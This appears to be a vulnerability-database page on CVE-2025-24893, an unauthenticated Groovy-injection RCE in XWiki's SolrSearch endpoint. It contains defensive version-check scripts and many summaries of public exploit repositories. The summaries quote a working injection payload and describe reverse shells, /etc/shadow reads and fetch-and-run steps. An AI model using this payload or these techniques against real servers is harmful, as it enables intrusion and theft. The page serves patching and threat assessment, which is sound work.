Unauthenticated RCE in XWiki SolrSearch
CVE-2025-24893 is a critical unauthenticated remote code execution vulnerability in XWiki Platform, in the SolrSearch feature shipped by the xwiki-platform-search-solr-ui component. It is classed as improper neutralization of directives in dynamically evaluated code (CWE-95, eval injection), reachable through requests to /xwiki/bin/get/Main/SolrSearch. The RSS feed template (media=rss) renders the user-supplied text parameter as wiki syntax in a document context that holds programming rights, so a guest can close the surrounding verbatim block with }}} and append a {{groovy}} macro that the server evaluates while generating the feed. Public descriptions and reproductions show the injected Groovy embedded in the text parameter and its output reflected in the generated RSS title, which confirms code execution and gives the attacker a response channel; blind payloads such as reverse shells work just as well, since the request needs no session, token or prior interaction. Affected versions run from 5.3-milestone-2 through 15.10.10 and from 16.0.0-rc-1 through 16.4.0; the fix shipped in 15.10.11, 16.4.1 and 16.5.0RC1. Because the Groovy runs inside the XWiki JVM with the application's own privileges, the issue impacts the confidentiality, integrity, and availability of the entire XWiki installation.
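Exposure check, added here as an example (not code from this page's source or from any of the repositories listed below): it encodes the affected and fixed ranges the exploit writeups report (5.3-milestone-2 through 15.10.10 and 16.0.0-rc-1 through 16.4.0 affected; 15.10.11, 16.4.1 and 16.5.0RC1 fixed) and parses XWiki's milestone and rc qualifiers, which a plain string comparison orders incorrectly. The version strings fed to it are constructed.

```python
"""
Decide whether an XWiki version is exposed to CVE-2025-24893.

Added example for this page. Ranges come from the upstream advisory as
repeated in the exploit writeups; the parser is this example's own.
"""
import re

# Inclusive affected ranges (milestone/rc qualifiers sort before the final release)
AFFECTED_RANGES = [
    ("5.3-milestone-2", "15.10.10"),
    ("16.0.0-rc-1", "16.4.0"),
]
# Releases that carry the fix, lowest first
FIXED_IN = ("15.10.11", "16.4.1", "16.5.0-rc-1")

# pre-release rank: milestone < rc < final (2)
QUALIFIER_RANK = {"milestone": 0, "rc": 1}

# Accepts "15.10.10", "16.5.0-rc-1", "16.5.0RC1", "5.3-milestone-2", "5.3-milestone2"
_VERSION = re.compile(r"^(\d+(?:\.\d+)*)(?:-?(milestone|rc)-?(\d+))?$", re.I)


def parse_version(s):
    """Normalise an XWiki version string into a comparable 5-tuple.

    '15.10.10'        -> (15, 10, 10, 2, 0)
    '16.5.0-rc-1'     -> (16, 5, 0, 1, 1)
    '5.3-milestone-2' -> (5, 3, 0, 0, 2)
    """
    m = _VERSION.match(s.strip())
    if not m:
        raise ValueError(f"unrecognised XWiki version: {s!r}")
    nums = [int(x) for x in m.group(1).split(".")]
    nums += [0] * (3 - len(nums))          # "5.3" is treated as 5.3.0
    if m.group(2):
        rank, n = QUALIFIER_RANK[m.group(2).lower()], int(m.group(3))
    else:
        rank, n = 2, 0                     # final release
    return tuple(nums[:3]) + (rank, n)


def is_affected(version):
    """True if `version` falls inside one of the advisory's affected ranges."""
    v = parse_version(version)
    return any(parse_version(lo) <= v <= parse_version(hi) for lo, hi in AFFECTED_RANGES)


def minimum_fix(version):
    """Lowest fixed release to move to, preferring the same major line; None if not affected."""
    v = parse_version(version)
    if not is_affected(version):
        return None
    candidates = [f for f in FIXED_IN if parse_version(f) > v]
    same_line = [f for f in candidates if parse_version(f)[0] == v[0]]
    return (same_line or candidates)[0]


if __name__ == "__main__":
    # Constructed inventory entries, not real hosts
    for host, ver in [("wiki-a", "14.10.16"), ("wiki-b", "16.4.0"), ("wiki-c", "16.5.0RC1")]:
        print(host, ver, "affected" if is_affected(ver) else "not affected", minimum_fix(ver))
```

Feed it the version reported at /xwiki/bin/view/Main/ (one writeup below uses that page for fingerprinting) or from your CMDB; unmaintained 12.x/13.x/14.x lines have no same-line fix, so the function points them at 15.10.11 as the lowest patched release.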
Exploits
40 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos.
This repository is a small standalone Python exploit for CVE-2025-24893 affecting XWiki. It contains one executable script (`CVE-2025-24-893.py`) and one README. The Python script uses the `requests` library with TLS verification disabled to send a GET request to the XWiki endpoint `/bin/get/Main/SolrSearch`, supplying a malicious `text` parameter that breaks into macro syntax and injects Groovy code. That Groovy code invokes `Runtime.getRuntime().exec()` with `/bin/bash -c 'echo <base64> | base64 -d | bash'`, where the decoded command is a Bash reverse shell to an attacker-controlled IP and port. The script dynamically generates the reverse-shell command from CLI arguments, base64-encodes it, and treats an HTTP timeout as a likely indicator that the shell is active. The exploit is operational rather than a mere PoC because it delivers a working payload, but it is not highly modular or framework-based. The README documents the target vulnerability, affected XWiki versions, usage with a Netcat listener, dependency installation, and patched versions. Overall, the repository’s purpose is unauthenticated web-based RCE exploitation of vulnerable XWiki instances to obtain a reverse shell.
This repository is a small standalone Python exploit for CVE-2025-24893 targeting XWiki. It contains two files: a README with vulnerability description, usage examples, and references; and exploit.py, the only code file and clear entry point. The exploit is not part of a larger framework. The exploit targets the XWiki SolrSearch endpoint at /xwiki/bin/get/Main/SolrSearch by sending a GET request with media=rss and a malicious text parameter. The payload breaks out of the expected template context and injects a Groovy block: }}}{{async async=false}}{{groovy}}println("<CMD>".execute().text){{/groovy}}{{/async}}. This causes the remote server to execute arbitrary OS commands and print their stdout into the RSS response. Core capabilities include: building the SSTI/Groovy payload, sending the exploit request over HTTP or HTTPS to a user-specified host and port, extracting reflected command output from the XML/RSS response using regex and HTML entity cleanup, executing a single command, and providing an interactive pseudo-shell loop for repeated remote command execution. The script uses argparse for CLI handling, requests for HTTP communication, regex-based parsing for output extraction, and termcolor/readline for usability. Fingerprintable targets/endpoints are limited and straightforward: the vulnerable XWiki path /xwiki/bin/get/Main/SolrSearch and the full constructed target URLs using either http or https. No hardcoded IPs, domains, C2 infrastructure, persistence paths, or registry keys are present. Overall, this is an operational unauthenticated web RCE exploit with a basic but functional command-execution payload and interactive operator workflow.
Repository contains a single Python exploit script (CVE-2025-24893.py), plus README and MIT LICENSE. Core capability: unauthenticated remote code execution against vulnerable XWiki instances by injecting a Groovy payload into the SolrSearch request. The script builds a URL of the form: <target>/xwiki/bin/get/Main/SolrSearch?media=rss&text=<urlencoded_payload> where the payload closes template context and invokes Groovy to run an attacker-supplied system command using "<command>".execute(). It then issues a single HTTP GET request (requests.get) with TLS verification disabled (verify=False) and a 15s timeout; it does not parse output, so it is effectively a blind command execution trigger. Notable implementation details: - CLI arguments: -t/--target (base URL) and -c/--command (command to execute). - Uses urllib.parse.quote to URL-encode the Groovy injection string. - No authentication/session handling; assumes endpoint is reachable. - The check_url() helper exists but is never used, and its protocol check logic is incorrect (uses 'or' instead of 'and'), but this does not affect exploitation because exploit() uses the raw target argument. Overall purpose: a small operational PoC/one-shot exploit to trigger RCE on XWiki via the SolrSearch macro injection described as CVE-2025-24893.
Repository contains a minimal proof-of-concept for CVE-2025-24893 targeting XWiki. Structure: (1) README.md: brief French description indicating an RCE PoC for XWiki. (2) simple_target_poc.py: Python script that takes a target base URL, forces https:// if no scheme is provided, and sends a single GET request to `/xwiki/bin/get/Main/SolrSearch` with `media=rss&text=<payload>`. The payload is a crafted XWiki template snippet that invokes a Groovy block to execute the OS command `id` (`"id".execute().text`) and prints markers `START_RES`/`END_RES`. The script disables TLS certificate verification, uses a 12-second timeout, checks for HTTP 200 and presence of `START_RES`, then regex-extracts and prints the command output (stripping `<br/>`). Overall purpose: confirm remote code execution by running `id` and displaying the result; no post-exploitation features (shell, persistence, lateral movement) are included.
This repository contains a working exploit for CVE-2025-24893, a critical unauthenticated remote code execution vulnerability in XWiki; its README gives the affected range as versions prior to 15.10.9, which understates it (the upstream fixes are 15.10.11, 16.4.1 and 16.5.0RC1). The exploit is implemented in a single Python script (pwn.py) that crafts a Groovy script injection payload, which is delivered via a GET request to the vulnerable SolrSearch RSS feed endpoint. The payload is a base64-encoded bash reverse shell, which is decoded and executed on the target, resulting in a shell connection back to the attacker's machine. The repository is minimal, containing only a license, a README with detailed usage instructions, and the exploit script. The exploit requires only the 'requests' Python library and is straightforward to use, making it operational and effective for penetration testing or red teaming against vulnerable XWiki instances.
This repository contains a Python proof-of-concept exploit for CVE-2025-24893, a critical unauthenticated remote code execution (RCE) vulnerability in the XWiki Platform's SolrSearch macro. The exploit targets XWiki versions 5.3-milestone2 through 15.10.10 and 16.0.0-RC1 through 16.4.0, where improper sanitization allows attackers to inject Groovy code via crafted HTTP GET requests to the /bin/get/Main/SolrSearch endpoint. The main file, CVE-2025-24893.py, provides both detection and exploitation capabilities: it can check if a target is vulnerable and, if so, execute arbitrary system commands either as a one-liner or interactively. The payload leverages Groovy template injection to invoke java.lang.Runtime.exec, enabling full command execution on the server. The README.md provides detailed technical background, affected versions, exploitation steps, and mitigation advice. No hardcoded IPs or external C2 endpoints are present; the exploit is generic and targets the specified XWiki endpoint. The repository is well-structured, with clear separation between exploit code and documentation, and is intended for authorized security testing and research.
This repository contains a Python proof-of-concept exploit for CVE-2025-24893, a critical unauthenticated remote code execution vulnerability in XWiki (up to version 15.10.10). The exploit leverages a server-side template injection flaw in the SolrSearch endpoint, allowing attacker-supplied input to be evaluated as Groovy code. The repository consists of a detailed README.md explaining the vulnerability, affected versions, and usage instructions, and a single exploit script (xwiki_cve_2025_24893.py). The script supports three modes: vulnerability check (benign code execution), reverse shell (connects back to the attacker's machine), and bind shell (opens a shell on the target for the attacker to connect to). The exploit works by sending crafted HTTP GET requests to the /xwiki/bin/get/Main/SolrSearch or /xwiki/bin/view/Main/SolrSearch endpoints, injecting Groovy code via the 'text' parameter. The payloads are base64-encoded bash commands executed on the target. No authentication is required, making this a high-impact exploit for unpatched, internet-facing XWiki instances.
This repository contains a Python exploit script (CVE-2025-24893.py) and a README.md. The exploit targets a remote code execution vulnerability in XWiki versions prior to 15.10.11, 16.4.1, and 16.5.0RC1. The script takes a target URL and a system command as arguments, then crafts a Groovy code injection payload and sends it to the vulnerable endpoint '/xwiki/bin/get/Main/SolrSearch?media=rss&text=' on the target XWiki instance. If successful, the specified command is executed on the server. The exploit is operational, allowing arbitrary command execution, and is intended for use against network-accessible XWiki servers. The README provides usage instructions and context about the vulnerability.
This repository contains a single Python script, 'exploit.py', which targets a Groovy code injection vulnerability in the XWiki platform's SolrSearch endpoint. The script takes a target host (IP, domain, or host:port) as an argument and attempts to verify if the endpoint is vulnerable by injecting a Groovy payload that executes a harmless command. If the target is vulnerable, the script provides an interactive shell-like interface, allowing the user to input arbitrary system commands, which are then executed on the target server via Groovy code injection. The results of the commands are displayed to the user. The exploit leverages HTTP GET requests to the '/xwiki/bin/get/Main/SolrSearch' endpoint with a specially crafted 'text' parameter. The script is operational and provides real command execution capabilities if the target is vulnerable. No hardcoded CVE is referenced, but the exploit is clearly aimed at XWiki instances with an exposed and vulnerable SolrSearch endpoint.
This repository contains a Python proof-of-concept exploit for CVE-2025-24893, a critical unauthenticated remote code execution (RCE) vulnerability in the XWiki Platform's SolrSearch macro. The exploit leverages unsafe Groovy template evaluation, allowing attackers to execute arbitrary system commands on the server without authentication. The main file, 'CVE-2025-24893.py', provides both detection and exploitation capabilities: it can check if a target is vulnerable and, if so, execute arbitrary commands either as a one-liner or interactively. The script targets the '/bin/get/Main/SolrSearch' HTTP endpoint, injecting malicious Groovy code via the 'search' parameter (every other writeup on this page, and the public reproductions, inject through the 'text' parameter). The README.md provides detailed background, affected versions (XWiki 5.3-milestone2 through 15.10.10 and 16.0.0-RC1 through 16.4.0), exploitation details, and mitigation advice. The exploit is operational, providing real command execution on vulnerable targets, and is not part of a larger framework. No hardcoded IPs or external domains are present; the script is designed for flexible targeting via user-supplied URLs.
This repository contains a Bash exploit script (CVE-2025-24893) and a detailed README. The exploit targets a critical unauthenticated remote code execution (RCE) vulnerability in XWiki Platform (CVE-2025-24893), specifically in the SolrSearch macro's handling of Groovy expressions. The script takes a target URL and a system command as arguments, constructs a Groovy payload to execute the command, URL-encodes it, and sends it to the vulnerable SolrSearch endpoint via an HTTP GET request. The attack does not require authentication or CSRF tokens and works against default configurations of affected XWiki versions. The README provides comprehensive background, usage instructions, affected versions, mitigation advice, and real-world exploitation context. The exploit is operational, allowing arbitrary command execution on the target server, and is being actively exploited in the wild. The main fingerprintable endpoint is '/xwiki/bin/get/Main/SolrSearch?media=rss&text=', which is used for the injection. The repository is well-structured, with clear separation between exploit code and documentation.
This repository contains a working proof-of-concept exploit for CVE-2025-24893, a remote code execution vulnerability in XWiki (versions prior to 15.10.11, 16.4.1, and 16.5.0RC1). The exploit is implemented in Python (xwiki_groovy_rce.py) and is accompanied by a README.md with usage instructions and vulnerability details. The exploit works by sending a specially crafted Groovy payload to the SolrSearch macro endpoint of a vulnerable XWiki instance, resulting in execution of a bash reverse shell command. The script can automatically start a listener on the attacker's machine to catch the reverse shell or use an existing one. The main fingerprintable endpoints are the XWiki SolrSearch HTTP endpoint and the attacker's TCP listener for the reverse shell. The exploit is operational, providing a real reverse shell if the target is vulnerable and accessible.
This repository contains a Python exploit script (xwiki_exploit.py) and a README.md for CVE-2025-24893, a remote code execution vulnerability in XWiki up to version 15.10.10. The exploit works by injecting a Groovy template payload via a crafted HTTP GET request to the XWiki SolrSearch endpoint. The payload is a base64-encoded bash reverse shell command, which is decoded and executed on the target server, resulting in a reverse shell connection to the attacker's machine. The script requires the attacker to provide the target's base URL, their own IP (lhost), and a listening port (lport). The README provides detailed usage instructions, listener setup, and background on the vulnerability. The exploit is operational, providing a working reverse shell if the target is vulnerable and the attacker's listener is set up correctly. The main attack vector is network-based, targeting the XWiki web application via HTTP. The repository is well-structured, with clear separation between documentation and exploit code.
This repository contains a Python exploit script (CVE-2025-24893.py) and a README for exploiting a remote code execution (RCE) vulnerability in XWiki (CVE-2025-24893). The exploit targets the SolrSearch endpoint of XWiki, injecting a specially crafted payload that leverages Groovy code execution to run arbitrary system commands. The script takes a target URL and a command as arguments, constructs the malicious request, and sends it to the vulnerable endpoint. The README provides an example for spawning a reverse shell and tips for upgrading the shell. The exploit is operational, allowing attackers to execute arbitrary commands or gain shell access on the target XWiki server. The main attack vector is network-based, requiring access to the XWiki web interface.
This repository provides a working exploit for CVE-2025-24893, a critical unauthenticated remote code execution (RCE) vulnerability in the XWiki Platform. The exploit is implemented in a single Python script (CVE-2025-24893.py) that crafts a malicious HTTP GET request to the vulnerable SolrSearch endpoint of a target XWiki instance. The payload leverages Groovy code injection to execute arbitrary system commands on the server, with the output returned in the HTTP response. The script is operational and allows the attacker to specify both the target URL and the command to execute. The README.md provides detailed background, usage instructions, affected versions, and mitigation steps. The main fingerprintable endpoint is the '/xwiki/bin/get/Main/SolrSearch' path, which is exploited via the 'text' parameter. The exploit does not require authentication and is effective against a wide range of XWiki versions prior to the patched releases. The repository is well-structured, with clear separation between exploit code and documentation.
This repository contains a functional proof-of-concept exploit for CVE-2025-24893, a remote code execution vulnerability in XWiki. The main file, 'CVE-2025-24893-reverse-shell.py', is a Python script that targets the SolrSearch endpoint of a vulnerable XWiki instance. It injects a Groovy macro payload via a crafted HTTP GET request, exploiting improper input sanitization to execute arbitrary commands on the server. The default payload opens a reverse shell to the attacker's specified IP and port using 'busybox nc'. The repository includes a README with usage instructions and a .gitattributes file for text normalization. The exploit requires the attacker to provide the target URL, their own IP, and a listening port. The attack vector is network-based, and the main fingerprintable endpoint is the '/xwiki/bin/get/Main/SolrSearch' path. The exploit is operational, providing a working reverse shell if the target is vulnerable.
This repository contains a proof-of-concept exploit for CVE-2025-24893, targeting the XWiki SolrSearch template injection vulnerability. The main exploit script, 'xwiki_solr_rce.py', is a Python 3 tool that allows an attacker to execute arbitrary commands or launch a reverse shell on a vulnerable XWiki instance without authentication. The exploit works by sending a specially crafted Groovy payload to the '/xwiki/bin/get/Main/SolrSearch' endpoint via the 'text' parameter, leveraging template injection to achieve code execution. The script supports two main modes: executing a single command (with output returned in Base64 for reliable parsing) and launching a reverse shell to an attacker-controlled host and port. The README provides clear usage instructions and notes that the exploit was tested against XWiki Debian 15.10.8, with the issue patched in later versions. The repository is structured with a single Python exploit script, a README with detailed instructions, and a license file. No hardcoded target endpoints are present; the user supplies the target URL and, for reverse shell, the attacker's IP and port.
This repository contains a working exploit for CVE-2025-24893, a critical unauthenticated remote code execution (RCE) vulnerability in XWiki. The exploit is implemented in a single Python script (CVE-2025-24893.py) that takes a target URL and a system command as arguments. It crafts a malicious Groovy payload and injects it into the 'text' parameter of the '/xwiki/bin/get/Main/SolrSearch' endpoint, exploiting improper evaluation of Groovy expressions in the SolrSearch macro. The script uses the requests library to send the payload and trigger command execution on the vulnerable server. The README provides detailed vulnerability information, affected and patched versions, and usage instructions. The exploit is operational, allowing arbitrary command execution on unpatched XWiki instances accessible over HTTP/S.
This repository contains a Python exploit script (CVE-2025-24893.py) targeting a Groovy code injection vulnerability in XWiki (CVE-2025-24893). The exploit interacts with the vulnerable SolrSearch endpoint on the domain wiki.editor.htb, injecting Groovy code via the 'text' parameter to execute arbitrary system commands on the server. The script encodes user-supplied commands, crafts a Groovy payload, and sends it to the target endpoint, then parses and displays the command output. The repository includes a license file and a brief README in Chinese stating the tool is for vulnerability remediation assistance only. The main exploit file is self-contained, requires the target to be accessible over HTTP, and provides interactive command execution capabilities.
This repository contains a Python proof-of-concept exploit for CVE-2025-24893, a critical unauthenticated remote code execution vulnerability in XWiki. The exploit consists of a single Python script (CVE-2025-24893.py) and a README.md file. The script allows an attacker to check if a target XWiki instance is vulnerable and, if so, execute arbitrary system commands remotely without authentication. It does this by injecting Groovy code into the SolrSearch macro via a crafted HTTP GET request. The script provides command-line options to specify the target URL, the command to execute, and a verification mode to check for vulnerability. The README.md provides usage instructions, affected versions, and references. The main endpoints targeted are '/xwiki/bin/view/Main/' for version checking and '/xwiki/bin/get/Main/SolrSearch?media=rss&text={payload}' for exploitation. The exploit is operational and demonstrates real RCE capability against vulnerable XWiki instances.
This repository contains a Python proof-of-concept exploit for CVE-2025-24893, targeting XWiki instances vulnerable to remote Groovy code execution via the SolrSearch endpoint. The main file, 'CVE-2025-24893.py', is a command-line tool that takes a base URL as input and allows the user to interactively send arbitrary system commands to the target server. The exploit works by injecting a specially crafted Groovy payload into the 'text' parameter of the '/xwiki/bin/get/Main/SolrSearch' endpoint, causing the server to execute the command and return its output. The script parses the response to extract and display the command output to the user. The repository also includes a README with basic usage instructions and a LICENSE file. No hardcoded IPs or domains are present; the user supplies the target URL. The exploit is operational, providing real command execution on vulnerable targets.
This repository provides a proof-of-concept exploit for CVE-2025-24893, a critical unauthenticated remote code execution (RCE) vulnerability in XWiki version 15.10.10. The exploit is implemented in a single Python script (CVE-2025-24893.py), which takes a target URL and a command to execute as arguments. It crafts a malicious HTTP GET request to the SolrSearch macro endpoint, injecting Groovy code that executes arbitrary system commands on the server. The script parses and displays the command output if the exploit is successful. The README.md provides background, usage instructions, and references. The repository is structured simply, with the main exploit script, a README, and a license file. The exploit targets the network-exposed SolrSearch macro endpoint and does not require authentication, making it highly impactful if the target is vulnerable.
This repository contains a proof-of-concept (POC) exploit for CVE-2025-24893, an unauthenticated remote code execution (RCE) vulnerability in XWiki Platform. The exploit is implemented in a single Python script (CVE-2025-24893.py) that targets the /xwiki/bin/get/Main/SolrSearch endpoint. By injecting Groovy code via the 'text' parameter, the script enables execution of arbitrary system commands on the vulnerable XWiki server, with the output returned in the RSS feed's title. The exploit does not require authentication and is effective against XWiki versions prior to 15.10.11, 16.4.1, and 16.5.0RC1. The README.md provides a detailed description of the vulnerability, exploitation steps, and mitigation advice. The repository is structured simply, with one exploit script and a README, and is intended for security testing and demonstration of the vulnerability.
This repository provides a proof-of-concept (PoC) exploit for CVE-2025-24893, a remote code execution (RCE) vulnerability in XWiki Platform versions prior to 15.10.11, 16.4.1, and 16.5.0RC1. The exploit is implemented in a single Python script ('exploit.py'), which interacts with a target XWiki instance over HTTP or HTTPS. The script prompts the user for the target's base URL, constructs a Groovy code injection payload using the 'text' parameter of the '/bin/get/Main/SolrSearch' endpoint, and sends it to the server. The payload executes arbitrary system commands on the server and returns their output, allowing the user to verify the RCE condition. The PoC is intentionally non-destructive and does not include weaponized payloads (e.g., reverse shells), focusing instead on safe demonstration commands. The repository also includes a README with usage instructions and a LICENSE file. The main attack vector is network-based, targeting a specific HTTP endpoint on the vulnerable XWiki server.
This repository contains a working exploit for CVE-2025-24893, a critical unauthenticated remote code execution (RCE) vulnerability in the XWiki Platform. The main exploit script, 'CVE-2025-24893.py', is written in Python and is the only code file in the repository. It allows an attacker to target a vulnerable XWiki instance by sending a specially crafted request to the '/bin/get/Main/SolrSearch' endpoint, injecting Groovy code that executes arbitrary system commands. By default, the exploit attempts to read '/etc/shadow' to demonstrate successful code execution. The script supports both single-target and multi-target (from a file) modes, automatically detects HTTP/HTTPS, and provides colored terminal output for clarity. The README provides usage instructions, impact details, and mitigation advice. No framework is used; the exploit is standalone and operational, with a hardcoded payload. The attack vector is network-based, requiring only access to the vulnerable web interface. The repository is well-structured, with clear documentation and a single, focused exploit script.
This repository provides a proof-of-concept exploit for CVE-2025-24893, a remote code execution (RCE) vulnerability in XWiki via the SolrSearch endpoint. The main exploit script, 'CVE-2025-24893.ts', is written in TypeScript and designed to be run with the Bun JavaScript runtime. It allows an attacker to execute arbitrary system commands or open a reverse shell on a vulnerable XWiki server by injecting Groovy code through a crafted HTTP GET request to the '/xwiki/bin/get/Main/SolrSearch' endpoint. The script supports command-line arguments for specifying the target URL, command to execute, or reverse shell parameters (attacker's IP and port). The exploit constructs a payload that leverages Groovy's 'execute()' method to run system commands on the server. The repository includes supporting files for user interface enhancements (fancy/fancier.ts), dependency management (package.json, bun.lock), and configuration (tsconfig.json). The README provides clear usage instructions. No hardcoded IPs or domains are present; the attacker supplies these at runtime. The exploit is operational, providing real RCE capabilities, but is not part of a larger exploitation framework.
This repository contains a Bash proof-of-concept exploit for CVE-2025-24893, a remote code execution (RCE) vulnerability in the XWiki Platform. The exploit is implemented in a single Bash script (cve.sh) that takes three arguments: the target XWiki URL, the attacker's listener IP, and the port. The script crafts a malicious Groovy payload and sends it to the vulnerable XWiki endpoint (/xwiki/bin/get/Main/SolrSearch) using curl. The payload executes a Python reverse shell, connecting back to the attacker's machine. The README provides usage instructions and affected version ranges. The exploit is operational and provides a working reverse shell if the target is vulnerable and accessible.
This repository provides a working exploit for CVE-2025-24893, a critical unauthenticated remote code execution vulnerability in XWiki (≤ 15.10.10, ≤ 14.10.16, and all unmaintained 13.x/12.x). The exploit leverages improper input handling in the SolrSearch macro, allowing attackers to inject Groovy code via the 'text' parameter in an HTTP GET request to '/xwiki/bin/get/Main/SolrSearch'. The provided Python script (CVE-2025-24893.py) automates the attack, supporting both reverse shell and arbitrary command execution. The script constructs a Groovy payload (optionally base64-encoded for reverse shells), URL-encodes it, and sends it to the vulnerable endpoint. The README.md offers detailed technical background, manual exploitation steps, affected version matrix, and mitigation advice. The exploit is operational and does not require authentication, making it highly dangerous for exposed XWiki instances.
This repository is a Proof of Concept (PoC) exploit for CVE-2025-24893, a remote code execution vulnerability in XWiki's SolrSearch endpoint. The repository contains four files: a LICENSE, a detailed README.md, the main exploit script (exploit.py), and a sample payload script (exploit.sh). The exploit.py script is the core of the PoC and is written in Python. It takes as arguments the target XWiki instance URL, the attacker's server address, and the filename of the malicious script to execute. The script crafts a Groovy payload that is injected into the SolrSearch endpoint, causing the target to execute a bash command that fetches and runs a shell script from the attacker's server. The output of the command is extracted from the HTTP response, cleaned of HTML tags/entities, and displayed to the user. The exploit demonstrates the ability to achieve arbitrary code execution on vulnerable XWiki instances. The repository is structured for ease of use and testing, with clear instructions and a sample payload. No hardcoded endpoints are present; all network targets are user-supplied at runtime.
This repository is a Rust-based proof-of-concept exploit for CVE-2025-24893, a critical unauthenticated remote code execution vulnerability in XWiki. The exploit targets the '/xwiki/bin/get/Main/SolrSearch?media=rss' endpoint, abusing a Groovy template injection flaw to execute arbitrary commands on the server. The main exploit logic is contained in 'src/main.rs', which constructs a Groovy payload that executes a base64-encoded bash reverse shell command. The exploit is configurable via command-line arguments for the target URL, listener IP, and port. The README provides clear usage instructions and details about affected and fixed XWiki versions. The exploit is a functional PoC and does not include advanced features such as payload customization beyond the reverse shell. No hardcoded IPs or domains are present; all targeting is user-supplied. The repository is well-structured, with a single Rust source file implementing the exploit logic.
This repository contains a Python proof-of-concept exploit for CVE-2025-24893, a remote code execution (RCE) vulnerability in XWiki Platform version 15.10.10. The exploit leverages a Groovy code injection vulnerability in the /xwiki/bin/view/Main/SolrSearch endpoint, accessible without authentication. The main file, CVE-2025-24893.py, accepts a target URL and a command to execute, crafts a malicious payload using Groovy code, and sends it as a URL-encoded parameter in an HTTP GET request. If successful, the server executes the supplied command and returns the output. The repository also includes a README.md with usage instructions and an example. No hardcoded endpoints or credentials are present; the exploit is generic and requires the user to supply the target URL and desired command.
This repository contains a working exploit for CVE-2025-24893, a critical unauthenticated remote code execution (RCE) vulnerability in XWiki. The exploit is implemented in a single Python script (CVE-2025-24893-dbs.py) and is accompanied by a detailed README.md explaining the vulnerability, affected versions, and usage instructions. The exploit works by crafting a malicious Groovy payload that is injected into the 'text' parameter of the /xwiki/bin/get/Main/SolrSearch endpoint. The payload is base64-encoded and, when processed by the vulnerable XWiki instance, results in the execution of a bash reverse shell command. The script prompts the user for the target URL, attacker's IP, and port, then constructs the exploit URL and sends it using curl. If successful, the attacker receives a reverse shell connection from the target server. The repository is well-structured, with clear separation between the exploit code and documentation. The exploit is operational and provides a real reverse shell payload, making it suitable for practical exploitation of vulnerable XWiki instances.
This repository contains a Python exploit script (CVE-2025-24893.py) targeting a remote code execution vulnerability in XWiki versions prior to 15.10.11, 16.4.1, and 16.5.0RC1. The exploit works by sending a crafted HTTP GET request to the /xwiki/bin/get/Main/SolrSearch endpoint, injecting a Groovy payload via the 'text' parameter. The payload executes arbitrary system commands on the target server. The script takes two arguments: the target URL and the command to execute. The README provides usage instructions and clarifies the affected XWiki versions. The exploit is operational, allowing attackers to run arbitrary commands remotely if the target is vulnerable and accessible.
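To turn that fixed-version list into an inventory check, here is an added example (written for this page, not code from any of the repositories listed) that parses XWiki release names, including RC and milestone qualifiers, and decides whether a given release predates the fix on its branch. The branch boundaries (15.10.x, 16.0 up to 16.4.x, 16.5 onward) and the assumption that every release below 15.10.11 is affected are mine; the page states only the three fixed versions 15.10.11, 16.4.1 and 16.5.0RC1.

```python
import re

# Fixed versions as stated on this page; every other boundary below is an assumption.
FIXED_15_10 = "15.10.11"
FIXED_16_4 = "16.4.1"
FIXED_16_5 = "16.5.0RC1"

# Pre-release qualifiers rank below a final release carrying the same numbers.
_PRE_RANK = {"milestone": 0, "m": 0, "rc": 1}
_FINAL_RANK = 2

_VERSION_RE = re.compile(
    r"(\d+)\.(\d+)(?:\.(\d+))?[-.]?(?:(rc|milestone|m)[-.]?(\d+))?",
    re.IGNORECASE,
)


def parse_version(text: str) -> tuple:
    """Parse XWiki release names such as '15.10.10', '16.4.0', '16.5.0RC1',
    '16.5.0-rc-1' or '16.0.0-milestone-2' into a comparable tuple
    (major, minor, patch, pre_rank, pre_number)."""
    m = _VERSION_RE.fullmatch(text.strip())
    if not m:
        raise ValueError(f"unrecognised XWiki version: {text!r}")
    major, minor, patch, pre, pre_num = m.groups()
    nums = (int(major), int(minor), int(patch or 0))
    if pre is None:
        return nums + (_FINAL_RANK, 0)
    return nums + (_PRE_RANK[pre.lower()], int(pre_num))


def is_vulnerable(version: str) -> bool:
    """True when `version` predates the fix on its branch.

    Branch logic (assumption): below 15.10.11 is unpatched; 16.0.0 up to but
    excluding 16.4.1 is unpatched; 16.5 is patched from 16.5.0RC1 onward.
    """
    v = parse_version(version)
    if v < parse_version(FIXED_15_10):
        return True
    if v < (16, 0, 0, 0, 0):          # 15.10.11 and later on the 15.10 line
        return False
    if v < parse_version(FIXED_16_4):
        return True
    if v < (16, 5, 0, 0, 0):          # 16.4.1 and later on the 16.4 line
        return False
    return v < parse_version(FIXED_16_5)


def triage(inventory: dict) -> dict:
    """Map host -> version for hosts still running an affected release."""
    return {host: ver for host, ver in inventory.items() if is_vulnerable(ver)}


if __name__ == "__main__":
    # Constructed inventory, not real hosts.
    sample = {
        "wiki-a.example": "15.10.10",
        "wiki-b.example": "15.10.11",
        "wiki-c.example": "16.4.0",
        "wiki-d.example": "16.5.0-rc-1",
    }
    for host, ver in triage(sample).items():
        print(f"{host}: {ver} is affected by CVE-2025-24893")
```

The pre-release ranking matters for the 16.5 line: 16.5.0RC1 is itself a fixed build, so a snapshot or milestone of 16.5.0 sorts below it and is reported as affected, while 16.5.0 final sorts above it and is not.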
This repository contains a Python exploit script (exploit.py) targeting CVE-2025-24893, a remote code execution vulnerability in the XWiki Platform. The exploit works by sending a specially crafted Groovy macro payload to the vulnerable XWiki endpoint (/xwiki/bin/get/Main/SolrSearch) via HTTP or HTTPS, depending on which protocol is supported by the target. The payload, when executed by the XWiki server, launches a Python-based reverse shell that connects back to the attacker's machine (LHOST:LPORT), granting remote command execution. The script automatically detects the correct protocol, constructs and URL-encodes the payload, and provides feedback on delivery status. The repository includes a README with detailed usage instructions and a LICENSE file. The main exploit logic resides in exploit.py, which is the only code file present.
This repository contains a Python proof-of-concept exploit for CVE-2025-24893, a remote code execution vulnerability in XWiki's Groovy macro when used with asynchronous rendering. The main script, 'CVE-2025-24893-PoC.py', provides an interactive terminal interface allowing the user to execute arbitrary shell commands on a vulnerable XWiki instance or deploy a reverse shell for persistent access. The exploit works by injecting Groovy expressions into the 'text' parameter of the SolrSearch RSS endpoint, causing the server to execute attacker-supplied commands. The script can also generate a reverse shell ELF payload using msfvenom, host it via a local HTTP server, and automate its download and execution on the target. The repository includes a README with detailed usage instructions, requirements, and workflow. The exploit is operational, providing both single-command execution and reverse shell capabilities, and is configurable for different target and attacker network settings.
